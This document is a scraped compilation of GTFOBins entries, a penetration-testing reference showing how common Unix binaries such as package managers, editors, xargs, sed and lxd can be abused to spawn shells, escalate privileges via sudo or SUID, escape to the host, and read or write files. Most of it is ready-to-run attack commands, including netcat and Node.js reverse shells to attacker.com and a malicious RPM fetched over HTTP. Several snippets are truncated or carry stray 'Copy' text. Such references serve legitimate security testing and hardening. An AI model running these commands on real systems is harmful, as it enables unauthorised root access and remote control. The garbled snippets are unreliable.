### Install RPM Package Source: https://gtfobins.org/api Installs an RPM package using the 'rpm' command. The example shows how to generate a package with fpm and then install it, potentially executing pre-install scripts. ```bash rpm -ivh x-1.0-1.noarch.rpm ``` -------------------------------- ### Install Snap Package Source: https://gtfobins.org/gtfobins/snap This snippet shows how to install a generated Snap package. It uses the `snap install` command with flags for dangerous installations and development mode, suitable for testing or potentially malicious use. ```shell snap install xxxx_1.0_all.snap --dangerous --devmode ``` -------------------------------- ### Start TLS Server with OpenSSL Source: https://gtfobins.org/api Sets up a TLS server using OpenSSL to securely transfer data. It generates a self-signed certificate and key, then starts the server. Requires OpenSSL to be installed. Input data is read from a specified file. ```bash openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 x.sh # fpm -n x -s dir -t deb -a all --before-install x.sh . # ``` ``` -------------------------------- ### Install Package with pip (Inherit Python) Source: https://gtfobins.org/api Install a Python package that executes arbitrary code during its setup process. This allows for privilege escalation or code execution by crafting a malicious `setup.py` file. The `--break-system-packages` flag may be omitted on older systems. ```shell echo '...' >setup.py pip install --break-system-packages . ``` -------------------------------- ### Setup Restic Receiver Server Source: https://gtfobins.org/gtfobins/restic This snippet provides the commands to set up a Restic server to receive backups and to initialize a new repository. It also shows how to restore data from the repository. ```shell rest-server --listen :12345 restic init -r rest:http://localhost:12345/x ``` ```shell restic restore -r /tmp/restic/x latest --target . ``` -------------------------------- ### Install Package with pkg Source: https://gtfobins.org/api Install a local FreeBSD package (`.txz` file) using the `pkg` command. This can be used to install custom or malicious packages. The example shows installing a package generated with `fpm`. ```shell pkg install -y --no-repo-update ./x-1.0.txz ``` -------------------------------- ### Start FTP Server using Python Source: https://gtfobins.org/gtfobins/ftp This snippet shows how to start a simple FTP server using Python's `pyftpdlib` module. This is useful for receiving uploaded files or sending downloaded files in the context of exploiting FTP. ```python python -m pyftpdlib -w -p 21 ``` -------------------------------- ### Spawn Shell via Bundle Install (Unprivileged) Source: https://gtfobins.org/gtfobins/bundle This snippet shows how to execute '/bin/sh' by writing a Ruby command to a Gemfile and then running 'bundle install'. This technique can potentially run the shell twice and is an unprivileged operation. It's effective when 'bundle install' can be executed. ```shell echo 'system("/bin/sh")' >Gemfile bundle install ``` -------------------------------- ### Start HTTP Server with Ruby Source: https://gtfobins.org/api Starts a simple HTTP server in the current directory using Ruby's built-in httpd module. This is useful for serving files for download. Requires Ruby version 1.9.2 or later. ```ruby ruby -run -e httpd . -p 80 ``` -------------------------------- ### Install Package with opkg Source: https://gtfobins.org/api Install a Debian package using `opkg`. This typically involves creating a package with `fpm` and then installing it. ```sh rpm opkg install x_1.0_all.deb ``` -------------------------------- ### Start Shell with Script Source: https://gtfobins.org/api This command uses `script` to start a shell session, redirecting its output to `/dev/null`. The `-q` flag ensures quiet operation. This can be used to obtain a shell in certain restricted environments. ```bash script -q /dev/null ``` -------------------------------- ### Serve GTFOBins Locally with Docker Source: https://gtfobins.org/contributing Starts a local instance of the GTFOBins website using Docker. This command builds the website and serves it from http://0.0.0.0:4000, with automatic application of local file changes. ```shell make serve ``` -------------------------------- ### Start Interactive Shell with Screen Source: https://gtfobins.org/api Executing the `screen` command without any arguments starts a new screen session, providing an interactive shell environment. ```bash screen ``` -------------------------------- ### Create a Shell-Spawning Shared Library Source: https://gtfobins.org/gtfobins/ldconfig This example provides the C code to compile a minimal shared library that executes `/bin/sh` upon loading. It uses the `constructor` attribute for automatic execution. ```c __attribute__((constructor)) init() { execl("/bin/sh", "sh", 0); } ``` -------------------------------- ### Inherit Functions with Bundle Help (Unprivileged) Source: https://gtfobins.org/gtfobins/bundle This demonstrates how to inherit functions from another executable using 'bundle help'. This is an unprivileged operation and can be useful for discovering or leveraging functionalities of other commands through 'bundle'. It does not require any specific setup beyond having 'bundle' installed. ```shell bundle help ``` -------------------------------- ### Create and Enable Systemd Service Source: https://gtfobins.org/api Create a temporary systemd service file to execute a command and then enable and start it. This method allows running arbitrary commands as a service, potentially with elevated privileges. It involves writing to the filesystem and using `systemctl` commands. ```bash echo '[Service] Type=oneshot ExecStart=/path/to/command [Install] WantedBy=multi-user.target' >/path/to/temp-file.service systemctl link /path/to/temp-file.service systemctl enable --now /path/to/temp-file.service ``` ```bash echo /bin/sh >/path/to/temp-file chmod +x /path/to/temp-file SYSTEMD_EDITOR=/path/to/temp-file systemctl edit basic.target ``` -------------------------------- ### Spawn Shell via npm preinstall script Source: https://gtfobins.org/gtfobins/npm This technique involves creating a package.json file with a 'preinstall' script that executes '/bin/sh'. Running 'npm install' then spawns a shell. This works for unprivileged users and can be used with sudo. ```shell echo '{"scripts": {"preinstall": "/bin/sh"}}' >package.json npm -C . i ``` -------------------------------- ### Run Container with ctr Source: https://gtfobins.org/api The 'ctr' command can be used to run containers. This example shows how to mount the root filesystem into a container, potentially allowing access to host files. ```shell ctr run --rm --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest x ``` -------------------------------- ### Privilege Escalation with install Source: https://gtfobins.org/api Utilizes the `install` command with SUID bit manipulation to escalate privileges. By setting the SUID bit on a file, it can be executed with elevated permissions. Requires `install` and write access to a directory. ```bash install -m 6777 /path/to/input-file /path/to/output-dir/ ``` -------------------------------- ### Spawn Shell using LXD (Shell) Source: https://gtfobins.org/gtfobins/lxd This snippet demonstrates how to spawn an interactive system shell using LXD. It requires the LXD environment to be set up and an Ubuntu image to be available. The commands initialize a privileged container, mount the host's root filesystem, start the container, and then execute a shell within it. ```shell lxc init ubuntu:16.04 x -c security.privileged=true lxc config device add x x disk source=/ path=/mnt/ recursive=true lxc start x lxc exec x /bin/sh ``` -------------------------------- ### Start HTTP Server with SocketServer Source: https://gtfobins.org/api Starts a simple HTTP server on a specified port using Python's SocketServer module. This can be used to serve files or establish a basic network service. ```python import SocketServer as ss ss.TCPServer(("", 12345), ss.SimpleHTTPRequestHandler).serve_forever() ``` -------------------------------- ### Download and Install RPM with yum Source: https://gtfobins.org/api YUM can install RPM packages directly from HTTP URLs. If an attacker controls the HTTP server, they can serve a malicious RPM file that executes arbitrary code upon installation. ```bash yum install http://attacker.com/path/to/input-file.rpm ``` -------------------------------- ### Install Debian Package with opkg (Shell) Source: https://gtfobins.org/gtfobins/opkg This function is performed by the privileged user if executed via `sudo` because the acquired privileges are not dropped. It demonstrates installing a Debian package using 'opkg'. ```shell rpm opkg install x_1.0_all.deb ``` -------------------------------- ### Execute Shell with pkexec Source: https://gtfobins.org/api Execute a shell with elevated privileges using `pkexec`. This leverages Polkit's privilege escalation mechanism. Requires `pkexec` to be installed and configured. ```shell pkexec /bin/sh ``` -------------------------------- ### Spawn Shell using apt-get Pre-Invoke (Sudo) Source: https://gtfobins.org/gtfobins/apt This snippet demonstrates how to spawn an interactive shell using the `APT::Update::Pre-Invoke` hook with `apt-get` when executed via `sudo`. It requires the target package (e.g., `sl`) to not be installed. Environment variables can be passed using `sudo VAR=value ...` or `sudo -E ...`. ```bash echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' >/path/to/temp-file apt-get -y install -c /path/to/temp-file slCopy ``` -------------------------------- ### Install Local RPM with dnf Source: https://gtfobins.org/api The `dnf` package manager can be used to install local RPM files. By creating a malicious RPM with a pre-installation script, arbitrary commands can be executed. The `--disablerepo=*` option is useful for offline targets. ```shell dnf install -y x-1.0-1.noarch.rpm --disablerepo=* ``` -------------------------------- ### Execute Shell with elvish Source: https://gtfobins.org/api Starts an interactive `elvish` shell session. ```elvish elvish ``` -------------------------------- ### Get Help Information with gcloud Source: https://gtfobins.org/api This command retrieves help information for `gcloud`. The output is typically viewed using a pager like `less`. ```gcloud gcloud help ``` -------------------------------- ### Execute Command using fpm and rpm Source: https://gtfobins.org/gtfobins/rpm This snippet demonstrates how to execute a non-interactive system command by creating an RPM package with 'fpm' and then installing it with 'rpm'. This can be performed by privileged users via sudo. ```bash echo /path/to/command >x.sh fpm -n x -s dir -t rpm -a all --before-install x.sh . rpm -ivh x-1.0-1.noarch.rpm ``` -------------------------------- ### Execute Ruby Code with gem Source: https://gtfobins.org/api The `gem` command can be used to build Ruby scripts or install them from a file. This allows for the execution of arbitrary Ruby code. ```ruby gem build /path/to/script.rb ``` ```ruby gem install --file /path/to/script.rb ``` -------------------------------- ### Execute System Commands with Yum Source: https://gtfobins.org/gtfobins/yum This snippet demonstrates how to execute arbitrary system commands using the 'yum' executable. It involves creating a shell script and then using 'fpm' to package it into an RPM, which can then be installed via 'yum'. This method is useful for command injection vulnerabilities. ```bash echo '/path/to/command' >x.sh fpm -n x -s dir -t rpm -a all --before-install .x.sh . yum localinstall -y x-1.0-1.noarch.rpm ``` -------------------------------- ### Read Files with cut Source: https://gtfobins.org/api The 'cut' command extracts sections from each line of files. This example shows how to read a file by specifying delimiters and fields. ```shell cut -d '' -f1 /path/to/input-file ``` -------------------------------- ### Receive Data via TFTP Server Source: https://gtfobins.org/gtfobins/tftp Sets up a TFTP server on the attacker machine to receive uploaded data. This command starts an atftpd server in the background, listening for incoming connections and saving files in the current directory. ```bash atftpd --no-fork --verbose --daemon --no-fork --user root.root . ``` -------------------------------- ### Read Local Files with Gzip Source: https://gtfobins.org/gtfobins/gzip Demonstrates how to read data from local files using the gzip utility. This can be performed by unprivileged users, or in privileged contexts such as sudo or SUID execution, provided the necessary permissions and configurations are in place. The example uses standard gzip commands to decompress and read file content. ```bash gzip -c /path/to/input-file | gzip -d ``` ```bash gzip -c /path/to/input-file | gzip -d ``` ```bash gzip -c /path/to/input-file | gzip -d ``` ```bash gzip -c /path/to/input-file | gzip -d ``` -------------------------------- ### Download File with TFTP Source: https://gtfobins.org/api Use TFTP to download a file from an attacker-controlled server. The `tftp` command initiates the transfer, and the `get` command specifies the file to retrieve. A TFTP server must be running on the attacker machine. ```bash tftp attacker.com get /path/to/input-file ``` ```bash atftpd --no-fork --verbose --daemon --no-fork --user root.root . ``` -------------------------------- ### Execute Python Code with easy_install Source: https://gtfobins.org/gtfobins/easy_install This snippet demonstrates how to execute arbitrary Python code using easy_install by creating a setup.py file. It's useful for gaining shell access or performing file operations. The TTY is lost, so /dev/tty can be used to regain interactive control. ```bash echo 'import os; os.system("exec /bin/sh /dev/tty 2>/dev/tty")' >setup.py easy_install . ``` -------------------------------- ### Spawn Shell with dmsetup (Unprivileged) Source: https://gtfobins.org/gtfobins/dmsetup This snippet demonstrates how to spawn an interactive system shell using the 'dmsetup' command when executed by an unprivileged user. It involves creating a device mapping and then executing a shell. ```shell dmsetup create base <Gemfile bundle install ``` -------------------------------- ### Read File with julia Source: https://gtfobins.org/api This Julia snippet reads the content of a file and prints it to standard output. It uses `open()` to get a file handle and `read()` to get the entire content as a String. ```bash julia -e 'print(open(f->read(f, String), "/path/to/input-file"))' ``` -------------------------------- ### Spawn Shell using Wget (Shell) Source: https://gtfobins.org/gtfobins/wget This snippet demonstrates how to spawn an interactive system shell using `wget` by creating a script and executing it via `wget --use-askpass`. This can be performed by unprivileged users, or with elevated privileges via `sudo` or SUID. ```shell echo -e '#!/bin/sh /bin/sh 1>&0' >/path/to/temp-file chmod +x /path/to/temp-file wget --use-askpass=/path/to/temp-file 0Copy ``` ```shell echo -e '#!/bin/sh /bin/sh 1>&0' >/path/to/temp-file chmod +x /path/to/temp-file wget --use-askpass=/path/to/temp-file 0Copy ``` ```shell echo -e '#!/bin/sh -p /bin/sh -p 1>&0' >/path/to/temp-file chmod +x /path/to/temp-file wget --use-askpass=/path/to/temp-file 0Copy ``` -------------------------------- ### Install Dangerous Snap Package Source: https://gtfobins.org/api Installs a Snap package using the `--dangerous` and `--devmode` flags. This bypasses signature checks and grants elevated privileges. The package must be generated first, typically using `fpm`. ```bash snap install xxxx_1.0_all.snap --dangerous --devmode ``` ```bash mkdir -p meta/hooks echo -e '#!/bin/sh\n/path/to/command; false' >meta/hooks/install chmod +x meta/hooks/install fpm -n xxxx -s dir -t snap -a all meta ``` -------------------------------- ### Spawn Shell by Copying and Running sh with run-parts (Shell) Source: https://gtfobins.org/gtfobins/run-parts This snippet demonstrates spawning a shell by first copying '/bin/sh' to a temporary directory and then executing it using 'run-parts'. This method is viable for unprivileged users. ```Shell cp /bin/sh /path/to/temp-dir/ run-parts /path/to/temp-dir/Copy ``` -------------------------------- ### Receive Upload with smbserver.py Source: https://gtfobins.org/gtfobins/smbclient This snippet demonstrates setting up a SMB/CIFS server using Impacket's smbserver.py to receive uploaded data. This is typically run on the attacker's machine. ```python smbserver.py -smb2support share .Copy ``` -------------------------------- ### Start Python HTTP Server Source: https://gtfobins.org/gtfobins/bash This command starts a simple HTTP server in the current directory using Python. It's often used in conjunction with download/upload functionalities to serve files from the attacker's machine. It runs on the specified port. ```python python -m http.server 80 ``` -------------------------------- ### Start Local HTTP Server for File Sharing using Python Source: https://gtfobins.org/gtfobins/python This command starts a simple HTTP server on the current directory using Python's built-in `http.server` module. It's useful for serving files locally, which can be accessed by other machines on the network. It supports both Python 2 and Python 3. ```python import sys if sys.version_info.major == 3: import http.server as s, socketserver as ss else: import SimpleHTTPServer as s, SocketServer as ss ss.TCPServer(("", 12345), s.SimpleHTTPRequestHandler).serve_forever() ``` -------------------------------- ### Spawn Shell with xargs Source: https://gtfobins.org/gtfobins/xargs This snippet demonstrates how to spawn an interactive system shell using the 'xargs' command. It is applicable for unprivileged users, and also shows variations for sudo and SUID contexts, with specific remarks on environment variable handling and SUID privilege dropping. ```shell xargs -a /dev/null /bin/shCopy ``` ```shell xargs -a /dev/null /bin/shCopy ``` ```shell xargs -a /dev/null /bin/sh -pCopy ``` ```shell xargs -a /dev/null /bin/shCopy ``` ```shell xargs -a /dev/null /bin/shCopy ``` ```shell xargs -a /dev/null /bin/sh -pCopy ``` ```shell echo x | xargs -o -a /dev/null /bin/shCopy ``` ```shell echo x | xargs -o -a /dev/null /bin/shCopy ``` ```shell echo x | xargs -o -a /dev/null /bin/sh -pCopy ``` -------------------------------- ### Spawn Shell with uv (Shell) Source: https://gtfobins.org/gtfobins/uv This snippet demonstrates how to spawn an interactive system shell using the 'uv' executable. It is applicable for unprivileged users and can be executed directly. ```shell uv run /bin/sh ``` -------------------------------- ### Execute Shell with rc Source: https://gtfobins.org/api Starts the rc shell, providing an interactive command-line environment. This can be used for general command execution. ```bash rc ``` -------------------------------- ### Execute Shell with fish Source: https://gtfobins.org/api The `fish` command starts the interactive Fish shell. This can be used to gain a shell in unprivileged, sudo, and SUID contexts. ```shell fish ``` -------------------------------- ### Create Device Mapper with dmsetup Source: https://gtfobins.org/api The `dmsetup` command can be used to create device mapper devices. By providing a crafted input to `dmsetup create`, it's possible to execute arbitrary commands, especially when combined with `dmsetup ls --exec`. ```shell dmsetup create base </path/to/temp-file neofetch --config /path/to/temp-fileCopy ``` -------------------------------- ### Spawn Shell with wg-quick (Shell) Source: https://gtfobins.org/gtfobins/wg-quick This snippet demonstrates how to spawn an interactive system shell using `wg-quick`. It requires creating a temporary configuration file with a shell command and then bringing the interface up. To reset and run the shell again, use `wg-quick down /path/to/temp-file.conf`. ```shell cat >/path/to/temp-file.conf < x.sh fpm -n x -s dir -t rpm -a all --before-install x.sh . dnf install -y x-1.0-1.noarch.rpm --disablerepo=* ``` -------------------------------- ### Write to File using vi Source: https://gtfobins.org/gtfobins/vi This section explains how to write data to local files using the 'vi' command. It demonstrates the process for unprivileged users, sudo execution, and SUID scenarios. The method involves opening a file, entering insert mode, typing data, and saving. ```shell vi /path/to/output-file iDATA ^[ w ``` -------------------------------- ### Spawn Shell with smbclient Source: https://gtfobins.org/gtfobins/smbclient This snippet demonstrates how to spawn an interactive system shell using smbclient. It requires a valid SMB/CIFS server and can be performed by unprivileged users or via sudo. ```shell smbclient '\\host\share' !/bin/shCopy ``` ```shell smbclient '\\host\share' !/bin/shCopy ``` -------------------------------- ### Spawn Shell with cpulimit (Shell) Source: https://gtfobins.org/gtfobins/cpulimit The cpulimit executable can be used to spawn an interactive system shell. This functionality is available to unprivileged users. Ensure cpulimit is installed and accessible. ```shell cpulimit -l 100 -f /bin/sh ``` -------------------------------- ### Spawn Shell using sed Source: https://gtfobins.org/gtfobins/sed This snippet demonstrates how to spawn an interactive system shell using the 'sed' command. It is applicable in unprivileged, sudo, and SUID contexts. Ensure the 'sed' version is GNU. ```shell sed -n '1e exec /bin/sh 1>&0' /etc/hosts ``` ```shell sed -n '1e exec /bin/sh 1>&0' /etc/hosts ``` ```shell sed -n '1e exec /bin/sh 1>&0' /etc/hosts ``` -------------------------------- ### Execute Shell with Tclsh Source: https://gtfobins.org/api Simply running the `tclsh` interpreter provides an interactive Tcl shell. If `tclsh` is available and can be executed, it can be used as a starting point for further commands or exploits. ```shell tclsh ``` -------------------------------- ### Spawn Shell with arch-nspawn Source: https://gtfobins.org/gtfobins/arch-nspawn This code snippet demonstrates how to use `arch-nspawn` to create an interactive shell within a chroot environment. It involves setting up necessary directories and configuration files before executing the command. The `arch-nspawn` command itself is used to enter the chroot, and the shell is spawned via `/bin/sh`. ```shell mkdir -p ./etc/ grep -oP "^CHROOT_VERSION='\K[^']+" /usr/share/devtools/lib/archroot.sh >.arch-chroot touch ./etc/pacman.conf echo 'CARCH=true;/bin/sh;exit' >etc/makepkg.conf arch-nspawn .Copy ``` -------------------------------- ### Spawn Shell with sshuttle Source: https://gtfobins.org/gtfobins/sshuttle This command spawns an interactive system shell using sshuttle. It's particularly useful when direct shell access is restricted. Ensure sshuttle is installed and accessible. ```shell sudo sshuttle -r x --ssh-cmd '/bin/sh -c "/bin/sh 0<&2 1>&2"' localhostCopy ``` -------------------------------- ### Spawn Shell with Dotnet Source: https://gtfobins.org/gtfobins/dotnet This snippet demonstrates how to spawn an interactive system shell using the dotnet executable. It can be executed by unprivileged users or with sudo, with no difference in functionality for this specific action. ```dotnet dotnet fsi System.Diagnostics.Process.Start("/bin/sh").WaitForExit();; ``` -------------------------------- ### Spawn Shell using Nano (Shell) Source: https://gtfobins.org/gtfobins/pico This snippet demonstrates how to spawn an interactive system shell using the 'nano' editor. It can be performed by unprivileged users, via sudo, or with SUID executables. The command 'reset; sh 1>&0 2>&0' is used to achieve this. ```shell nano ^R^X reset; sh 1>&0 2>&0 ``` ```shell nano ^R^X reset; sh 1>&0 2>&0 ``` ```shell nano ^R^X reset; sh 1>&0 2>&0 ``` -------------------------------- ### Nice: Execute shell Source: https://gtfobins.org/api This demonstrates executing a shell with the `nice` command. `nice` is typically used to alter scheduling priority, but when combined with a shell, it can sometimes be used to bypass restrictions if the `nice` binary has elevated privileges or is misconfigured. ```bash nice /bin/sh ``` -------------------------------- ### Spawn Shell with stdbuf (Unprivileged) Source: https://gtfobins.org/gtfobins/stdbuf This snippet demonstrates how to spawn an interactive shell using 'stdbuf' when running as an unprivileged user. It requires no special setup beyond having the 'stdbuf' command available. ```shell stdbuf -i0 /bin/sh ``` -------------------------------- ### Spawn Shell with rustup (Shell) Source: https://gtfobins.org/gtfobins/rustup This snippet demonstrates how to spawn an interactive system shell using the 'rustup' executable. It requires creating temporary directories for binaries and libraries, copying a shell executable, linking a custom toolchain, and then running the shell via 'rustup'. This can be performed by any unprivileged user. ```shell mkdir /path/to/temp-dir/bin/ mkdir /path/to/temp-dir/lib/ cp /bin/sh /path/to/temp-dir/bin/rustc rustup toolchain link x /path/to/temp-dir/ ustup run x rustc ``` -------------------------------- ### Execute Shell with kubectl Source: https://gtfobins.org/api This method uses `kubectl` to create a temporary kubeconfig file that executes `/bin/sh` when `kubectl get pods` is run. The shell is spawned multiple times. ```bash cat >/path/to/temp-file <&2' EOF kubectl get pods --kubeconfig=/path/to/temp-file ``` -------------------------------- ### Inherit Functions from apt-get (Unprivileged) Source: https://gtfobins.org/gtfobins/apt This demonstrates how an unprivileged user can inherit functions from `apt-get` by executing `apt-get changelog`. This can potentially grant access to functionalities like spawning shells, executing commands, and file operations if `apt-get` is configured to allow such inheritance. ```bash apt-get changelog aptCopy ``` -------------------------------- ### Write File with Go Source: https://gtfobins.org/api This Go code snippet demonstrates how to write data to a file. It opens a file in read-write mode, creates it if it doesn't exist, writes specified data to it, and then closes the file. ```go echo -e 'package main\nimport "os"\nfunc main(){\n\tf, _ := os.OpenFile("/path/to/output-file", os.O_RDWR|os.O_CREATE, 0644)\n\tf.Write([]byte("DATA\\n"))\n\tf.Close()\n}' >/path/to/temp-file.go go run /path/to/temp-file.go ``` -------------------------------- ### Create shared library payload with gcc Source: https://gtfobins.org/gtfobins/tclsh This example demonstrates creating a minimal shared library using gcc that spawns a shell upon loading. It includes considerations for SUID contexts and capabilities. ```bash echo '__attribute__((constructor)) init() { execl("/bin/sh", "sh", 0); }' \ | gcc -w -fPIC -shared -o lib.so -x c - Copy ``` -------------------------------- ### Execute Ruby Code with irb Source: https://gtfobins.org/api Allows execution of Ruby code through the interactive Ruby console (`irb`). This can be used to run arbitrary Ruby scripts or commands. Requires Ruby to be installed. ```ruby irb ... ``` -------------------------------- ### Netcat Reverse Shell (nc) Source: https://gtfobins.org/gtfobins/nc Establishes a reverse shell connection from the target to the attacker. This requires Netcat to be installed on the target system and accessible by the user. The attacker listens on a specified port. ```bash nc -e /bin/sh attacker.com 12345 ``` ```bash nc -l -p 12345 ``` -------------------------------- ### Spawn Shell using csvtool Source: https://gtfobins.org/gtfobins/csvtool This snippet demonstrates how to spawn an interactive system shell using the `csvtool` executable. It can be performed by any user, including unprivileged ones, and also details usage with `sudo` and SUID bit set for elevated privileges. The command executes `/bin/sh;false` to ensure the shell is interactive and then exits. ```shell csvtool call '/bin/sh;false' /etc/hostsCopy ``` ```shell sudo csvtool call '/bin/sh;false' /etc/hostsCopy ``` ```shell csvtool call '/bin/sh;false' /etc/hostsCopy ``` -------------------------------- ### Generate Rust Documentation with Rustdoc Source: https://gtfobins.org/api This command generates documentation files for Rust code. It can be used to create HTML documentation in a specified output directory. Partial content might be displayed as error messages if the input file is not a valid Rust source. ```bash rustdoc /path/to/input-file ``` -------------------------------- ### lxd: Execute Shell in Privileged Container Source: https://gtfobins.org/api Starts a privileged LXD container and executes a shell within it. This allows access to the container's filesystem and potentially the host's if the disk is mounted. ```bash lxc init ubuntu:16.04 x -c security.privileged=true lxc config device add x x disk source=/ path=/mnt/ recursive=true lxc start x lxc exec x /bin/sh ``` ```bash lxc image import ./alpine*.tar.gz --alias x lxc init x x -c security.privileged=true lxc config device add x x disk source=/ path=/mnt/ recursive=true lxc start x lxc exec x /bin/sh ``` -------------------------------- ### Read File with Go Source: https://gtfobins.org/api This Go code snippet demonstrates how to read the content of a file. It takes a file path as input, reads its content, and prints it to standard output. ```go echo -e 'package main\nimport (\n\t"fmt"\n\tos"\n)\n\nfunc main(){\n\tb, _ := os.ReadFile("/path/to/input-file")\n\tfmt.Print(string(b))\n}' >/path/to/temp-file.go go run /path/to/temp-file.go ``` -------------------------------- ### Spawn Shell using split Source: https://gtfobins.org/gtfobins/split This snippet demonstrates how to spawn an interactive system shell using the 'split' command. It can be performed by any unprivileged user and is effective when the 'split' executable has the SUID bit set or is executed via sudo. ```shell split --filter='/bin/sh -i 0<&2 1>&2' /etc/hostsCopy ``` -------------------------------- ### Execute Shell with Scanmem Source: https://gtfobins.org/api The `scanmem` utility, primarily used for memory inspection, can also be used to spawn a shell. After launching `scanmem`, the command `shell /bin/sh` can be used to get an interactive shell. ```bash scanmem shell /bin/sh ``` -------------------------------- ### Get ld.so Path using strings Source: https://gtfobins.org/gtfobins/ld This command uses 'strings' to extract the first line of the executable path for the current process, which is typically the path to ld.so. This is useful for dynamically locating the linker on different systems. ```shell strings /proc/self/exe | head -1 ``` -------------------------------- ### Spawn Shell using apt-get Update Pre-Invoke (Sudo) Source: https://gtfobins.org/gtfobins/apt This command leverages `apt-get update` with the `APT::Update::Pre-Invoke` option to execute `/bin/sh` when run with `sudo`. This allows for shell spawning by exploiting the pre-invocation hook during the package list update process. ```bash apt-get update -o APT::Update::Pre-Invoke::=/bin/shCopy ``` -------------------------------- ### Netcat Bind Shell (nc) Source: https://gtfobins.org/gtfobins/nc Binds a shell to a local port on the target system, allowing an attacker to connect to it. This method requires Netcat to be installed on the target and the port to be accessible. The attacker initiates the connection. ```bash nc -l -p 12345 -e /bin/sh ``` ```bash nc victim.com 12345 ``` -------------------------------- ### Spawn Interactive Shell with rpmquery Source: https://gtfobins.org/gtfobins/rpmquery This snippet demonstrates how to spawn an interactive system shell using the 'rpmquery' executable. It can be executed by unprivileged users, or with elevated privileges via sudo or SUID. ```shell rpmquery --eval '%(/bin/sh 1>&2)' ``` ```shell rpmquery --eval '%(/bin/sh 1>&2)' ``` ```shell rpmquery --eval '%(/bin/sh 1>&2)' ``` -------------------------------- ### Spawn Shell using FTP Source: https://gtfobins.org/gtfobins/ftp This snippet demonstrates how to spawn an interactive system shell using the FTP executable. It is applicable for unprivileged users, and also when executed via sudo or with SUID bit set, as the effective privileges are not dropped in these cases. ```shell ftp !/bin/sh ``` -------------------------------- ### Run Command with rustup (Command) Source: https://gtfobins.org/gtfobins/rustup This snippet shows how to execute non-interactive system commands using 'rustup'. It involves setting up a temporary directory, placing the desired command in the 'bin' directory, making it executable, linking a toolchain, and running it. This method is suitable for unprivileged users. ```shell mkdir /path/to/temp-dir/bin/ mkdir /path/to/temp-dir/lib/ echo '/path/to/command' >/path/to/temp-dir/bin/rustc chmod +x /path/to/temp-dir/bin/rustc ustup toolchain link x /path/to/temp-dir/ ustup run x rustc ``` -------------------------------- ### Spawn Shell with Elvish Source: https://gtfobins.org/gtfobins/elvish This executable can spawn an interactive system shell. It can be performed by any unprivileged user, or by a privileged user via sudo or SUID if the executable has the SUID bit set and the right ownership. ```elvish ``` elvishCopy ``` ``` ```elvish ``` elvishCopy ``` ``` ```elvish ``` elvishCopy ``` ``` -------------------------------- ### Read File with xargs Source: https://gtfobins.org/gtfobins/xargs This section details how to use 'xargs' to read data from local files. It covers unprivileged execution and provides examples for sudo and SUID contexts. A remark notes potential data corruption for binary files. ```shell xargs -a /path/to/input-file -0Copy ``` ```shell xargs -a /path/to/input-file -0Copy ``` ```shell xargs -a /path/to/input-file -0Copy ``` -------------------------------- ### Spawn Shell with tmate (Shell) Source: https://gtfobins.org/gtfobins/tmate This snippet demonstrates spawning an interactive system shell using the 'tmate' executable. It is applicable for unprivileged users and requires no special setup beyond having 'tmate' available in the system's PATH. ```shell tmate -c /bin/sh ``` -------------------------------- ### Spawn Shell using Nano with -s option (Shell) Source: https://gtfobins.org/gtfobins/pico This demonstrates spawning a shell using 'nano -s /bin/sh'. The SPELL environment variable can be used if the command line cannot be changed. This works for unprivileged users, sudo, and SUID scenarios. ```shell nano -s /bin/sh /bin/sh ^T^T ``` ```shell nano -s /bin/sh /bin/sh ^T^T ``` ```shell nano -s '/bin/sh -p' /bin/sh -p ^T^T ``` -------------------------------- ### Node.js: Reverse shell with SUID Source: https://gtfobins.org/api This Node.js script establishes a reverse shell, similar to the previous example, but spawns `/bin/sh` with the `-p` flag. This is intended to maintain elevated privileges if the Node.js process has the SUID bit set. ```javascript node -e 'sh = require("child_process").spawn("/bin/sh", ["-p"]); require("net").connect(12345, "attacker.com", function () { this.pipe(sh.stdin); sh.stdout.pipe(this); sh.stderr.pipe(this); })' ``` -------------------------------- ### Create Domain with virsh create Source: https://gtfobins.org/api The `virsh` command can be used to manage virtual machines. This snippet shows how to create a new domain (VM) by providing an XML configuration file. The `script path='/path/to/command'` in the domain definition allows specifying a script to be executed during domain creation, potentially leading to command execution. ```bash cat >/path/to/temp-file.xml < x hvm 1